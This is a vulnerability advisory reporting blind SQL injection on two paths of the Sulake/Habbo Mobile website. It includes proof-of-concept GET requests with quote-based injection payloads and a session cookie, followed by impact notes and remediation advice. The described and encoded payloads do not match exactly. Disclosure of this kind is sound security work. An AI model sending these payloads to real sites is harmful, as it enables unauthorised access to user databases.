============================================ Habbomobile-SULAKE- Social Network Blind SQLInjection ============================================= I. VULNERABILITY ------------------------- #Habbomobile.com/sulake.com Blind SQLInjection #Author:Juan Carlos García #Affected items /careers/ /press/awards/ II. DESCRIPTION ------------------------- Habbomobile/ Sulake (sulake.com/habbomobile.com) is a social entertainment company focused on online social places and games. The goal is to inspire playful interaction and self-expression in people by creating easy to use social online services. Currently, these services include social game and online community Habbo Hotel. The main product of Sulake is Habbo Hotel, the world’s largest social game and online community for teenagers. The Habbo online community has customers in 150 countries and 5 million teenagers visit the different communities every month. III. PROOF OF CONCEPT ------------------------- Attack details 1- /careers/ URL encoded GET input print was set to -1' or '3'='3 GET /careers/?print=-1%27%20or%204%20%3d%20%275 HTTP/1.1 Cookie: CONCRETE5=grs072dtvq30fnuk357ier9nq4 Host: www.sulake.com /habbomobile.com 2-/press/awards/ URL encoded GET input print was set to -1" or "3"="3 GET /press/awards/?print=-1%22%20or%204%20%3d%20%225 Cookie: CONCRETE5=grs072dtvq30fnuk357ier9nq4 Host: www.sulake.com / habbomobile.com IV. BUSINESS IMPACT ------------------------- An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. V SOLUTION ------------------------- #Sanitize the input It's absolutely vital to sanitize user inputs to insure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out some dangerous characters, it's harder to point to all of them. #Escape/Quotesafe the input #Use bound parameters (the PREPARE statement) Though quotesafing is a good mechanism, we're still in the area of "considering user input as SQL" and a much better approach exists:Bound parameters, which are supported by essentially all database programming interfaces VI. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García(@secnight) VII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The Author accepts no responsibility for any damage caused by the use or misuse of this information. VIII. FOLLOW ME ------------------------- You can follow me (@secnight) http://www.highsec.es http://hackingmadrid.blogspot.com http://blogs.0verl0ad.com Twitter:@secnight Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn